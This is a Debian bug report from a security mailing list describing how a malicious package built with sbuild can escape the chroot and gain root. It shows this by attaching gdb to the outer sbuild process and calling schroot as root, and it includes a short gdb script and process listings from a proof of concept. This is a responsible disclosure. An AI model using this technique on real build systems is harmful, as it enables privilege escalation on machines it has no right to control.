Ansgar Burchardt
2012-Feb-23 18:37 UTC
[Secure-testing-team] Bug#661037: process building package can escape from chroot and gain local root
Package: sbuild
Version: 0.62.6-1
Severity: important
Tags: security
When building a package with sbuild, the processes running in the chroot
can escape from there and gain local root. This is possible as the
processes in- and outside of the chroot environment run under the same
user id and the outside process can run commands as root in the chroot
environment.
To be precise, a malicious package could for example use gdb to attach
to the outside process and then execute something along the lines of
system("schroot -u root -c [known-chroot-name] [some-command]"). An
example package doing so is attached (it needs procps installed in the
chroot):
====================================================================[...]
1001 12772 \_ /usr/bin/perl /usr/bin/sbuild -j12 -d unstable -A
sbuild-to-root_1.dsc
1001 12779 \_ package log for sbuild-to-root_1_amd64
root 13988 \_ schroot -d /?PKGBUILDDIR? -c
unstable-amd64-sbuild-0fda4b02-2706-4743-8931-1c77cac39d9c --run-session -q -u
sbuild-user -p -- dpkg-buildpackage -us -uc -b -rfakeroot -j12
1001 13989 \_ /usr/bin/perl /usr/bin/dpkg-buildpackage -us -uc -b
-rfakeroot -j12
1001 14041 \_ /usr/bin/make -f debian/rules build
1001 14042 \_ /usr/bin/perl -w /usr/bin/dh build
1001 14051 \_ /usr/bin/make -f debian/rules
override_dh_auto_build
1001 14052 \_ /bin/sh ./sbuild-to-root
1001 14053 \_ ps axfu
[...]
Will try using 12772...
Guessed chroot name: unstable-amd64-sbuild
--- gdb-script -----------------------
p system("cd /; schroot -u root -c unstable-amd64-sbuild ps axfu")
detach
--------------------------------------
[...]
1001 12772 \_ /usr/bin/perl /usr/bin/sbuild -j12 -d unstable -A
sbuild-to-root_1.dsc
1001 12779 \_ package log for sbuild-to-root_1_amd64
root 13988 \_ schroot -d /?PKGBUILDDIR? -c
unstable-amd64-sbuild-0fda4b02-2706-4743-8931-1c77cac39d9c --run-session -q -u
sbuild-user -p -- dpkg-buildpackage -us -uc -b -rfakeroot -j12
1001 13989 | \_ /usr/bin/perl /usr/bin/dpkg-buildpackage -us -uc -b
-rfakeroot -j12
1001 14041 | \_ /usr/bin/make -f debian/rules build
1001 14042 | \_ /usr/bin/perl -w /usr/bin/dh build
1001 14051 | \_ /usr/bin/make -f debian/rules
override_dh_auto_build
1001 14052 | \_ /bin/sh ./sbuild-to-root
1001 14068 | \_ gdb -batch -x gdb-script
/usr/bin/perl 12772
1001 14072 \_ sh -c cd /; schroot -u root -c unstable-amd64-sbuild ps
axfu
root 14073 \_ schroot -u root -c unstable-amd64-sbuild ps axfu
root 14169 \_ /bin/ps axfu
[...]
====================================================================
As building untrusted package is not a good idea anyway, I don''t think
this issue is grave, however it would still be nice if there was an
option to run the processes inside the chroot under a different userid.
Regards,
Ansgar
-- System Information:
Debian Release: wheezy/sid
APT prefers testing
APT policy: (500, ''testing''), (100,
''unstable''), (1, ''experimental'')
Architecture: amd64 (x86_64)
Kernel: Linux 3.2.0-1-amd64 (SMP w/12 CPU cores)
Locale: LANG=C, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages sbuild depends on:
ii adduser 3.113+nmu1
ii apt-utils 0.8.15.9
ii libsbuild-perl 0.62.6-1
ii perl 5.14.2-7
ii perl-modules 5.14.2-7
Versions of packages sbuild recommends:
ii debootstrap 1.0.38
ii fakeroot 1.18.2-1
Versions of packages sbuild suggests:
ii deborphan <none>
ii wget 1.13.4-2
-- no debconf information
-------------- next part --------------
A non-text attachment was scrubbed...
Name: sbuild-to-root_1.tar.gz
Type: application/x-gzip
Size: 1386 bytes
Desc: not available
URL:
<http://lists.alioth.debian.org/pipermail/secure-testing-team/attachments/20120223/811e38e9/attachment.bin>